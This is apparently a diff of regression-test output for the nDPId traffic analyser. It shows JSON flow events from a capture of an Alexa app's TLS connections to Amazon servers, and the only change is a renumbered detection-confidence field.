00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1490976046478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976046478,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodelAAEAG0RmsECrYNF7ohrJwAbub2CWahTe5cVAQAVcGaQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976046418,"flow_last_seen":1490976046478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976046478,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":605,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976046418,"flow_last_seen":1490976046847,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976046847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976046418,"flow_last_seen":1490976046478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976046478,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":605,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976046418,"flow_last_seen":1490976046847,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976046847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047014,"flow_last_seen":1490976047014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047014,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1490976047014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047014,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JC1AAEAG7\/2sECrYNu8YuoTxAbsotHSAAAAAAKAC\/\/+r6QAAAgQFtAQCCAoA9lCtAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047050,"flow_last_seen":1490976047050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047050,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1490976047050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047050,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8zEVAAEAGR+WsECrYNu8YuoTyAbvILJz0AAAAAKAC\/\/\/j9wAAAgQFtAQCCAoA9lCxAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1490976047071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047071,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYANAAOcGDTM27xi6rBAq2AG7hPHQ2dGWKLR0gXASH\/53JwAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1490976047073,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047073,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJC5AAEAG8BCsECrYNu8YuoTxAbsotHSB0NnRl1AQAVfBmAAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047014,"flow_last_seen":1490976047075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047075,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047014,"flow_last_seen":1490976047075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047075,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047096,"flow_last_seen":1490976047096,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047096,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1490976047096,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047096,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Q4ZAAEAGA2msECrYNF7ohrJzAbuRhBMzAAAAAKAC\/\/+poAAAAgQFtAQCCAoA9lC1AAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1490976047107,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047107,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYitAAOcGCws27xi6rBAq2AG7hPIGkxHQyCyc9XASH\/45RwAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1490976047109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047109,"pkt":"AMDKkaPvePiC0\/vCCABFAAAozEZAAEAGR\/isECrYNu8YuoTyAbvILJz1BpMR0VAQAVeDuAAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047050,"flow_last_seen":1490976047111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047111,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047014,"flow_last_seen":1490976047133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047133,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047050,"flow_last_seen":1490976047111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047111,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047014,"flow_last_seen":1490976047133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047133,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1490976047154,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047154,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwRp1AAOcGWV00XuiGrBAq2AG7snPq5wFokYQTNHASH\/4rBwAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1490976047155,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047155,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoQ4dAAEAGA3ysECrYNF7ohrJzAbuRhBM06ucBaVAQAVd1eAAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047096,"flow_last_seen":1490976047156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":641,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047050,"flow_last_seen":1490976047169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047169,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976047096,"flow_last_seen":1490976047217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047096,"flow_last_seen":1490976047156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":641,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047050,"flow_last_seen":1490976047169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047169,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976047096,"flow_last_seen":1490976047217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047560,"flow_last_seen":1490976047560,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1490976047560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047560,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8csJAAEAG6uOsECrYNFXR2NSbAbtgrSImAAAAAKAC\/\/+\/5AAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047563,"flow_last_seen":1490976047563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047563,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1490976047563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047563,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8y+FAAEAGgVWsECrYSBXOh6SfAbuD+JsFAAAAAKAC\/\/9DRwAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1490976047602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047602,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71JuiSVznYK0iJ6AScSA47wAAAgQFtAQCCAptkKkCAPZQ5AEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1490976047603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976047603,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0csNAAEAG6uqsECrYNFXR2NSbAbtgrSInoklc6IAQAVfXgQAAAQEICgD2UOhtkKkC"} -00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047560,"flow_last_seen":1490976047610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976047610,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047560,"flow_last_seen":1490976047610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976047610,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 